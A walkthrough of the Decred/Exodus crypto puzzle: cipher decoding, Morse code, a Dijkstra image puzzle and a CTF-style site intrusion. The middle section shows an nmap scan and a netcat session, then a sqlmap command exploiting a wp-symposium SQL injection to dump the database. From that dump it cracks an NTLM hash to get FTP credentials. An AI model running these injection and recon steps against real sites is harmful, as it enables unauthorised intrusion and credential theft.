# Decred — Exodus Puzzle Walkthrough

The puzzle begins at the link https://www.exodus.io/decred/

We arrive at an image with two clickable links: one on the computer screen and one above the keyboard. The first leads to a video showing several enemy ships (7 in total) attempting to attack the player ship, but they are all defeated one by one. Each battleship’s shifts in motion and bullets fired collectively represent 8 bits (0’s for the shifts and 1’s for the bullets fired).

If we use a complete ASCII table (http://www.theasciicode.com.ar), we can decode all the information and arrive at

`0111 1010 - z`
`1001 0111 - ù`
`1000 1010 - è`
`0110 0100 - d`
`0010 1111 - /`
`0111 0110 - v`
`0111 0000 - p`

Now this text, as you might guess, is ciphered. So here we turn to the image of the keyboard that we discovered earlier on the puzzle homepage (https://www.exodus.io/decred/img/80s-Keyboard-Dark.jpg)

This keyboard is a hint that the ciphered text can be deciphered on an AZERTY keyboard, with a simple shift to the right. We can do this here: http://www.dcode.fr/keyboard-shift-cipher

We get the following results

`azerty →    am-s.co`
`azerty ↑    s)uc9'm`
`azerty ←    e*_f§b^`
`azerty ↓    é^,eLfà`

As you may notice, the first one seems to be a URL. So if we visit that website, we get to a “Protected Site” page with a password prompt for entry.
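The two decoding steps above can be reproduced offline. This is an added example, not code from the puzzle or from the original write-up; it assumes the extended-ASCII table is code page 437 (which agrees with the characters listed above) and a standard French AZERTY PC layout, and the function names are made up for illustration.

```python
# Added example; the bit string is the one quoted in this walkthrough.
BITS = "01111010 10010111 10001010 01100100 00101111 01110110 01110000"

# French AZERTY PC layout, one string per physical row and layer
# (assumption: standard layout; unshifted rows first, then shifted rows).
AZERTY_ROWS = [
    "²&é\"'(-è_çà)=", "azertyuiop^$", "qsdfghjklmù*", "<wxcvbn,;:!",
    "1234567890°+", "AZERTYUIOP¨£", "QSDFGHJKLM%µ", ">WXCVBN?./§",
]


def decode_bits(bits: str) -> str:
    """Turn space-separated octets into text using code page 437."""
    return bytes(int(octet, 2) for octet in bits.split()).decode("cp437")


def shift_keys(text: str, step: int) -> str:
    """Replace each character by the key `step` places along its row."""
    out = []
    for ch in text:
        for row in AZERTY_ROWS:
            pos = row.find(ch)
            if pos != -1:
                out.append(row[(pos + step) % len(row)])
                break
        else:
            out.append(ch)  # not on the layout: keep as-is
    return "".join(out)


if __name__ == "__main__":
    password = decode_bits(BITS)
    print(password)                  # text recovered from the video
    print(shift_keys(password, -1))  # each key replaced by its left neighbour
    print(shift_keys(password, +1))  # each key replaced by its right neighbour
```

Replacing every key by its left-hand neighbour gives the row that reads as a host name; the right-hand neighbour gives the third row of the results above.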

If you remember the ciphered text we discovered from the video file, you can enter it to proceed

`zùèd/vp`

Once we enter that password, we arrive at a basic WordPress site with the following post, which sets out some basic rules and gives a couple of hints as to what direction not to proceed in. In doing so, it also makes it quite obvious that the next part of the challenge will be to penetrate the site in some way, making it sort of a CTF-style challenge.

`Rules & Code of Conduct `
`Please follow these rules in order to avoid creating obstacles/pitfalls for yourself and others.`
`* PLEASE, no denial of service / resource exhaustion attacks. It will not lead you to anything helpful for this puzzle.`
`*`
`* Thinking about brute forcing logins/passwords?`
`You need to just >>>`
`…….╱¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯╲….╱░.░░░░░░░░░░░░░░░░░░░ ╲.╱░░.░░░░░░░░░░░░░░░░░░░░. .╲|░░░░█▀▀░▀█▀░█▀█░█▀█░░░░░░░░||░░░░▀▀█░░█░░█░█░█▀▀░░░░░░░░||░░░░▀▀▀░░▀░░▀▀▀░▀░░░░░░░░░░|.╲░.░░░░░░░░░░░░░░░░░░░░░░ ╱….╲░.░░░░.░░░░░░░░░░░░░░░╱……¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯`
`This will not help you. Penetrating SSH service is not one of the steps so don’t bother trying.`

A player then continues from reading the instructions and may decide to do a port scan of the website with nmap. If so, he’d get the following results.

`Prasanths-MBP:~ Administrator$ nmap am-s.co`
`Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-01 14:34 EDT`
`Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan`
`Connect Scan Timing: About 7.85% done; ETC: 14:36 (0:01:10 remaining)`
`Stats: 0:00:12 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan`
`Connect Scan Timing: About 12.57% done; ETC: 14:36 (0:01:03 remaining)`
`Nmap scan report for am-s.co (208.77.99.224)`
`Host is up (0.050s latency).`
`rDNS record for 208.77.99.224: server1.adbogie.com`
`Not shown: 981 closed ports`
`PORT     STATE    SERVICE`
`21/tcp   open     ftp`
`22/tcp   open     ssh`
`25/tcp   filtered smtp`
`53/tcp   open     domain`
`80/tcp   open     http`
`110/tcp  open     pop3`
`111/tcp  open     rpcbind`
`135/tcp  filtered msrpc`
`139/tcp  filtered netbios-ssn`
`143/tcp  open     imap`
`443/tcp  open     https`
`445/tcp  filtered microsoft-ds`
`465/tcp  open     smtps`
`587/tcp  open     submission`
`993/tcp  open     imaps`
`995/tcp  open     pop3s`
`3306/tcp open     mysql`
`6667/tcp open     irc`
`7000/tcp open     afs3-fileserver`
`Nmap done: 1 IP address (1 host up) scanned in 22.03 seconds`

It’s interesting to note that ports 21 and 22 (FTP and SSH) are open. We know from the blog post that penetrating SSH is not an option, but the post says nothing about FTP. It’s good to remember this information for use further down the puzzle trail. All other ports are basic and don’t give any response. The initial scan doesn’t cover all the ports, so if we go on to do a full nmap scan of the website, we notice that port 62217 is open and the service is unknown.

`PORT      STATE SERVICE`
`62217/tcp open  unknown`

If we try to connect to the port with a program like netcat, we reach an app running on the port

`Prasanths-MBP:~ Administrator$ nc am-s.co 62217`
`Hello, my friend!`
`The current time is: 14:37:41`
`XJ NZWZCD LCP XLYJ LD DZXP ZQ JZF XLJ DZZY QTYO, SZHPGPC ESPCP TD L NPCELTY EZBFP ESLE JZF HTWW YPPO EZ RPE ESP CPBFTCPO NSLCLNEPCD EZ QTYTDS ESP CLNP EZ ESP PYO. RZZO WFNV LYO ACPDD ZYHLCO EZ GTNEZCJ!`

The text block that we get looks like some sort of cipher, so if we put it through a Caesar shift cipher and run through all the possible shifts, we eventually get to a deciphered message.

Now notice that one word, “TOQUE”, seems a little out of place. That’s because it’s scrambled: it is an anagram of “QUOTE.” You should also notice that the application running on port 62217 seems to be accepting input. This should lead you to believe that there is some sort of quote or message you need to enter to get to the next step.
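The brute force described above, as an added example that is not part of the original write-up: it tries all 26 shifts of the service’s reply, ranks the candidates with a small constructed word list, and checks the TOQUE/QUOTE anagram. The function names and the word list are assumptions made for this example.

```python
import string

# Ciphertext exactly as returned by the service in the session above.
CIPHERTEXT = (
    "XJ NZWZCD LCP XLYJ LD DZXP ZQ JZF XLJ DZZY QTYO, SZHPGPC ESPCP TD L "
    "NPCELTY EZBFP ESLE JZF HTWW YPPO EZ RPE ESP CPBFTCPO NSLCLNEPCD EZ "
    "QTYTDS ESP CLNP EZ ESP PYO. RZZO WFNV LYO ACPDD ZYHLCO EZ GTNEZCJ!"
)

# Small constructed word list, used only to rank the 26 candidates.
COMMON = {"THE", "TO", "AND", "OF", "YOU", "IS", "A", "THAT", "WILL", "ARE"}


def caesar(text, shift):
    """Shift A-Z forward by `shift`, leaving other characters untouched."""
    upper = string.ascii_uppercase
    k = shift % 26
    return text.translate(str.maketrans(upper, upper[k:] + upper[:k]))


def score(text):
    """Count how many words of `text` are common English words."""
    words = text.translate(str.maketrans("", "", string.punctuation)).split()
    return sum(word in COMMON for word in words)


def crack(ciphertext):
    """Try all 26 shifts and return (shift, plaintext) with the best score."""
    candidates = ((s, caesar(ciphertext, s)) for s in range(26))
    return max(candidates, key=lambda pair: score(pair[1]))


def is_anagram(a, b):
    """True when both words use exactly the same letters."""
    return sorted(a.upper()) == sorted(b.upper())


if __name__ == "__main__":
    shift, plaintext = crack(CIPHERTEXT)
    print(shift, plaintext)
    print(is_anagram("TOQUE", "QUOTE"))
```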

Going back to the video we found at the beginning of the puzzle, if you do some further analysis on the audio of that video, you will notice that there is morse code hidden in it.

This morse decodes to:

“WE DO NOT MERELY DESTROY OUR ENEMIES WE CHANGE THEM”

If you google this quote, you will notice the first link that pops up directs to http://www.shmoop.com/1984/power-quotes-5.html which tells you it’s a quote from 1984 by George Orwell. If you copy the quote from that website that reads “We do not merely destroy our enemies, we change them.” and paste that into your netcat interaction with the app on port 62217, you will get to the next step. It will return the following.

`XCQaqlM4biiFF==RRAYKbJ61V5Ni0fH8mXRxjCpSzs`
`suEYCRwBWKO3ms9XANQle7sRojZUD6Dpr8rexZJOtm`
`CxLDBaBk51w0C528b5jfeGpuFNKzmWgexhOfduXoh2`
`4hb4bhOx7XS5Xs7faWlfzhBx8HF1MpKCrkWyH3NGko`
`XP1l|tEA|e5KzsGRn2=JoTn6uRyy46Y=0bs1gMEh8e`
`VDKa1Y6OKyC9JcfkcqHyICC7qJCTdm0rbcy06ATG2i`
`tEmgBYqQ6Sd8JbpmT6Xht81Tz442HJvhaKzxXnSIqr`
`sFPIbFw4LbFhyoKnnF6VK0YkjP+H3aYL6A7i81HApf`
`ZI88X6tdyH2jLQHXRpu0aW8EFdsCdhYSnhsUNKc7Rg`
`osmh0h74g3I9FRv5NQZj2zg0lzjg2+pXAWjR/MFGRG`
`xqLfwRf7YDmNjNEJPfI3c16bX/I5aLX8bcwlX4h4TC`
`RiqXvWVBEO7fxwUUe5cnB201RY2jFOy8tc2cPU+q94`
`bv2ocvROsP2LXwbyR1rmomvFCkAbETxfM9F3jDO7J7`
`WQtQOLYX46xILVJo8iltsAoNpNwlzcX+NlKb8odnEm`
`sepHMEJ9-EAFMuafJ8UzwSeHfPLdYxs3e60k88wjh8|`
`0ycfyTiA5JYzequT8-Wevc3rFJokdXLbw3gFnqz5yH|`
`EohRzFxB4Rv2RqmCrTAmIhlFVZSgNVAR7sQcOCzVHZ|`
`vKUQqKXWklzXS5mt24kLunvQb4dCvGhoQYfI1EPeSY`
`EOz5SM5JlNOcN4z7C'Acc9V1I53zaOs1oS03D1FkXo|`
`eyiUuJWgn9Jk9qDwKzobzR7yC9pcAK01lBJAeolZ3b|`
`g3gVrmD9cena6INnyWpuBt8A9kOhC6UEEQqkBEM8VI|`
`lkCifs3hegF6bDJ7AEZvssbZoMHywrfhFapxncbW1b`
`SlSTTcoa17gYPp4e+JEyGumhLjSyibmp6pxtOhhdXt|`
`0cShlLmneDRYsYqqIhqd5GliFK7VC6wrYMPc9hctet|`
`ywn0mvQJH9pIoOWA0LM4SEaHg9Om2xaArGy2vWrXEA|`
`40IssqJeuUqD2FuH44MqzETYJkFWmO5IVmTzgPdDLR`
`WbAyLD1oiq7tg4x7obsBYACPUddV1tSiNP+ddswH3Y`
`66tAjAfmICqbebHizUhsJi71WVxugLYwELC/m1b7ca`
`NbH1W8zm5eXHfyaW1HtfLPRJB6gQ8aHGRfF73LKUz9|`
`ZmpiWfSbCRLfmNNQV6caaxV6qOQ6MdME5zDDhOLioY`
`l81tbUNgcTCodzOPTirlql5vYyUcgKIUAxndwVM1JT`
`wnqma5teMwqrOKO24kPNojQXZcvL9w47wF51F2io9J`
`3RMY3N4sCMM2M5MpDDyLcZ8Rc6kMyoDh79KTpsefYv`
`v8hrV7LyQvI7wRIp0D4EMB0t4oUCbdDCeTruLUTvXH|`
`ezYDv9ZLRruskKiBhCxrnCGnMCOq2wfO0QD38BmS7B`
`GD0Kjw83re7jcoo9Noow3ftpf6G3XzoGP6yCuvhkUu`
`3ID5on0KBfi27cHoQ8IK8mwahRd8A==lOL0DwJD0Gk`
`wJUVA1ZiHL0R0gZPBKu3btTDOwI9ytm5dbhmJJQ1vF`
`ZkUNe2CehudTGDhO13l7gNGpf7HFpF0rfKraD2qxX0`
`sIsNZ2ZiuNinFceVMLGWT2MtiSjilo0vLi5Tn9i2Rr`
`WztE56pqrUYUWmwctiZInBvmqWfTlsKxrkUmFEQbm7`
`a7ymkg4w4P7q0ld0pHxA15NA48plzhkyt1CW78p4st`

The next step required some extensive scanning with wpscan or a similar tool to find a vulnerability in the site. Since not much progress was made, a hint (“nice joint”) was given during the Decred live stream broadcast on YouTube. “Nice joint” is simply an anagram of “injection”, as some soon figured out, and that should have led you to believe there was an SQL injection vulnerability in the website. With a little further scanning, you should have noticed that wp-symposium version 14.11, a plugin for WordPress, was installed, and it is known to have an SQL injection vulnerability: https://www.exploit-db.com/exploits/37824/
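For the fix side of this class of bug, here is an added example (constructed for this page, not the plugin’s code) that puts a query built from a request parameter next to an allow-listed version. It assumes the `size` parameter ends up as a column expression in the query, and it uses an in-memory SQLite table with made-up table and column names.

```python
import sqlite3


def make_db():
    """Constructed stand-in for a gallery table; not the plugin's schema."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE gallery_items (iid INTEGER, thumb_url TEXT, original_url TEXT)"
    )
    db.execute("INSERT INTO gallery_items VALUES (1, 't1.jpg', 'o1.jpg')")
    return db


def get_item_vulnerable(db, size, iid):
    # The column expression comes straight from the request, so whatever
    # SQL the caller puts in `size` is evaluated by the database.
    sql = f"SELECT {size} FROM gallery_items WHERE iid = ?"
    return db.execute(sql, (iid,)).fetchone()[0]


# Request value -> fixed column name. Placeholders cannot bind identifiers,
# so the only safe input is one that selects from this map.
ALLOWED_SIZES = {"thumb": "thumb_url", "original": "original_url"}


def get_item_hardened(db, size, iid):
    column = ALLOWED_SIZES.get(size)
    if column is None:
        raise ValueError("unsupported size")
    sql = f"SELECT {column} FROM gallery_items WHERE iid = ?"
    return db.execute(sql, (iid,)).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    print(get_item_vulnerable(db, "thumb_url", 1))         # intended use
    print(get_item_vulnerable(db, "sqlite_version()", 1))  # expression runs
    print(get_item_hardened(db, "thumb", 1))
    try:
        get_item_hardened(db, "sqlite_version()", 1)
    except ValueError as exc:
        print("rejected:", exc)
```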

Now that you know this, you should move to exploit it either by a custom written script or more preferably a program like sqlmap.

You can begin with a simple command such as the following.

`sqlmap -u "http://am-s.co/wp-content/plugins/wp-symposium/get_album_item.php?size=version()%20%3B%20--" --dbs --level 3`

Once you’ve dumped the entire database, you should notice a table with a unique name that is not part of the normal WordPress schema

`wp_ptfacdeeilnrst`

The characters after the underscore, as you might notice, can be reordered to make “ftpcredentials”

If you proceed to dump the data from this table, you should get the following information

`user_name:  4017B940CAE24016AAD3B435B51404EE`
`user_password: BCA2A84FA7A10EF3F06FA49727B0EAC567928360`

If you examine further, you should notice that the “user_name” field seems to contain a hash. It is hashed with NTLMv1.0, which is no longer considered secure, so if you proceed to un-hash it, it will come out to “exodus”

As for the user password, you should notice that all the characters in there can be separated into 8 bit hex values.

e.g.

`BC A2 A8 4F A7 A1 0E F3 F0 6F A4 97 27 B0 EA C5 67 92 83 60`

Now if we proceed to convert these to decimal numbers and use those values to correspond to the letter place in the text block that we found earlier, we should get the password.

Here’s a little script that one of the puzzle players @blue_sky_catastrophe on the Decred Slack Channel (http://decred.slack.org) wrote to help do this faster.

`raw_str = """XCQaqlM4biiFF==RRAYKbJ61V5Ni0fH8mXRxjCpSzssuEYCRwBWKO3ms9XANQle7sRojZUD6Dpr8rexZJOtmCxLDBaBk51w0C528b5jfeGpuFNKzmWgexhOfduXoh24hb4bhOx7XS5Xs7faWlfzhBx8HF1MpKCrkWyH3NGkoXP1l|tEA|e5KzsGRn2=JoTn6uRyy46Y=0bs1gMEh8eVDKa1Y6OKyC9JcfkcqHyICC7qJCTdm0rbcy06ATG2itEmgBYqQ6Sd8JbpmT6Xht81Tz442HJvhaKzxXnSIqrsFPIbFw4LbFhyoKnnF6VK0YkjP+H3aYL6A7i81HApfZI88X6tdyH2jLQHXRpu0aW8EFdsCdhYSnhsUNKc7Rgosmh0h74g3I9FRv5NQZj2zg0lzjg2+pXAWjR/MFGRGxqLfwRf7YDmNjNEJPfI3c16bX/I5aLX8bcwlX4h4TCRiqXvWVBEO7fxwUUe5cnB201RY2jFOy8tc2cPU+q94bv2ocvROsP2LXwbyR1rmomvFCkAbETxfM9F3jDO7J7WQtQOLYX46xILVJo8iltsAoNpNwlzcX+NlKb8odnEmsepHMEJ9-EAFMuafJ8UzwSeHfPLdYxs3e60k88wjh8|0ycfyTiA5JYzequT8-Wevc3rFJokdXLbw3gFnqz5yH|EohRzFxB4Rv2RqmCrTAmIhlFVZSgNVAR7sQcOCzVHZ|vKUQqKXWklzXS5mt24kLunvQb4dCvGhoQYfI1EPeSYEOz5SM5JlNOcN4z7C'Acc9V1I53zaOs1oS03D1FkXo|eyiUuJWgn9Jk9qDwKzobzR7yC9pcAK01lBJAeolZ3b|g3gVrmD9cena6INnyWpuBt8A9kOhC6UEEQqkBEM8VI|lkCifs3hegF6bDJ7AEZvssbZoMHywrfhFapxncbW1bSlSTTcoa17gYPp4e+JEyGumhLjSyibmp6pxtOhhdXt|0cShlLmneDRYsYqqIhqd5GliFK7VC6wrYMPc9hctet|ywn0mvQJH9pIoOWA0LM4SEaHg9Om2xaArGy2vWrXEA|40IssqJeuUqD2FuH44MqzETYJkFWmO5IVmTzgPdDLRWbAyLD1oiq7tg4x7obsBYACPUddV1tSiNP+ddswH3Y66tAjAfmICqbebHizUhsJi71WVxugLYwELC/m1b7caNbH1W8zm5eXHfyaW1HtfLPRJB6gQ8aHGRfF73LKUz9|ZmpiWfSbCRLfmNNQV6caaxV6qOQ6MdME5zDDhOLioYl81tbUNgcTCodzOPTirlql5vYyUcgKIUAxndwVM1JTwnqma5teMwqrOKO24kPNojQXZcvL9w47wF51F2io9J3RMY3N4sCMM2M5MpDDyLcZ8Rc6kMyoDh79KTpsefYvv8hrV7LyQvI7wRIp0D4EMB0t4oUCbdDCeTruLUTvXH|ezYDv9ZLRruskKiBhCxrnCGnMCOq2wfO0QD38BmS7BGD0Kjw83re7jcoo9Noow3ftpf6G3XzoGP6yCuvhkUu3ID5on0KBfi27cHoQ8IK8mwahRd8A==lOL0DwJD0GkwJUVA1ZiHL0R0gZPBKu3btTDOwI9ytm5dbhmJJQ1vFZkUNe2CehudTGDhO13l7gNGpf7HFpF0rfKraD2qxX0sIsNZ2ZiuNinFceVMLGWT2MtiSjilo0vLi5Tn9i2RrWztE56pqrUYUWmwctiZInBvmqWfTlsKxrkUmFEQbm7a7ymkg4w4P7q0ld0pHxA15NA48plzhkyt1CW78p4st"""`
`# each hex byte is a 1-based position in raw_str`
`idxs = [int(c, 16) for c in "BC A2 A8 4F A7 A1 0E F3 F0 6F A4 97 27 B0 EA C5 67 92 83 60".split(" ")]`
`print(''.join([raw_str[i-1] for i in idxs]))`

This will give you the password “RrNe3C=TqFWhplHubah1” for the FTP account under the username “exodus”

Once you log in via FTP to the website, you should notice that there is one file to download, called “ee03c8d2493cfad0b9c7ab42722dfa5b.svg”

Here’s what it looks like

This graphical puzzle is the last step before we get an encrypted ciphertext which when we decrypt with a certain key, will lead to the concatenated wallet seed that contains the prize.

To solve this, you must first notice that this is a graphical Dijkstra’s algorithm problem: each color in the image has a certain numerical weight associated with it (Orange 5, Cyan 2, White 10, Blue 4, Yellow 2, Magenta 3; given by the port service program if you tried to enter the FTP password after the quote), and you must try to find the shortest path between two nodes, starting at the green and ending at the red. The nodes are not the shapes but the individual pixels.

This will require some basic programming which should give a result similar to the following if you do it correctly. It should also give you a total cost of 328.
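A pixel-level Dijkstra search of the kind described above, as an added example rather than the solvers’ own program. It uses the colour weights quoted in the walkthrough on a small constructed grid instead of the real SVG, and it assumes 4-neighbour moves, that stepping onto a pixel costs that pixel’s weight, and that the green and red pixels cost 0.

```python
import heapq

# Colour weights quoted in the walkthrough; G (green) is the start pixel
# and R (red) the end pixel, both given cost 0 here (assumption).
WEIGHT = {"O": 5, "C": 2, "W": 10, "B": 4, "Y": 2, "M": 3, "G": 0, "R": 0}

# Constructed 5x4 "image", one letter per pixel (not the puzzle's SVG).
GRID = [
    "GWWWW",
    "CWOOY",
    "CYYWY",
    "WWMBR",
]


def shortest_path(grid):
    """Dijkstra over pixels; moving onto a pixel costs its colour weight."""
    cells = {(r, c): ch for r, row in enumerate(grid) for c, ch in enumerate(row)}
    start = next(p for p, ch in cells.items() if ch == "G")
    goal = next(p for p, ch in cells.items() if ch == "R")
    dist, prev = {start: 0}, {}
    heap = [(0, start)]
    while heap:
        d, pos = heapq.heappop(heap)
        if pos == goal:
            break
        if d > dist[pos]:
            continue  # stale queue entry, a cheaper route was found already
        r, c = pos
        for nxt in ((r + 1, c), (r - 1, c), (r, c + 1), (r, c - 1)):
            if nxt in cells:
                nd = d + WEIGHT[cells[nxt]]
                if nd < dist.get(nxt, float("inf")):
                    dist[nxt], prev[nxt] = nd, pos
                    heapq.heappush(heap, (nd, nxt))
    # Walk the predecessor links back from the goal to recover the path.
    path = [goal]
    while path[-1] != start:
        path.append(prev[path[-1]])
    return dist[goal], path[::-1]


if __name__ == "__main__":
    cost, path = shortest_path(GRID)
    print(cost, path)
```

The returned list of (row, column) pixels is what gets laid over the text block in the next step.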

Well, now what? The next step is to overlay the block of text on top of this image and see where the path leads!

The next step is to closely make your way down the path, line by line (except those that have | after them) and begin to construct the AES 256 bit encrypted ciphertext. The only exception is that the last line of the cipher text will spill over to start at the beginning and end at “==”

If you do it correctly, you should end up with the following ciphertext

`bFhyoKnnF6VK0YkjP+H3aYL6A7i81HApfH2jLQHXRpu0aW8EFdsCdhYSnhsUNKc7Rg3I9FRv5NQZj2zg0lzjg2+pXAWjR/MFGRG3c16bX/I5aLX8bcwlX4h4TCnB201RY2jFOy8tc2cPU+q94momvFCkAbETxfM9F3jDO7J7NpNwlzcX+NlKb8odnEmQb4dCvGhoQYfI1EPeSYZoMHywrfhFapxncbW1b5IVmTzgPdDLRSiNP+ddswH3YYwELC/m1b7ca5zDDhOLioYAxndwVM1JTwF51F2io9J79KTpsefYv8BmS7BuvhkUu3ID5on0KBfi27cHoQ8IK8mwahRd8A==`

Now if you use the total cost calculation that we got from finding the least cost path for this maze, “three hundred and twenty eight” as the key to decrypt this ciphertext, you will get the wallet seed!

`virusguitaristswelterBradburyoffloadinertianecklaceembezzletroubletypewriterdropperGalvestonrockerunicornstairwaymicrowavestaplertravestyAthenssurrenderdrumbeateverydaychatterbusinessmanmusicmonumentsoybeanracketeerZulucompanyZulutruncatednecklace`

CREDITS:

These are the handles of the users from the Decred Slack Channel who helped solve critical parts of the puzzle.

@grubana & @narcelio — morse code from the video
@johnnyjorege & @pandac — binary from the video & deciphering the result
@yash — password entry on the website
@johnnyjorege scanning and discovering app on port 62217
@pandac deciphering text from port service
@pandac , @blue_sky_catastrophe inputting quote found from morse earlier
@sham791 —figured out how to dump data from SQLi vulnerability
@blue_sky_catastrophe & @johnnyjorege for getting the FTP password from the block of text
@africanalex — figuring out to start at green, end at red for puzzle image
@sham791 — for discovering the wallet seed
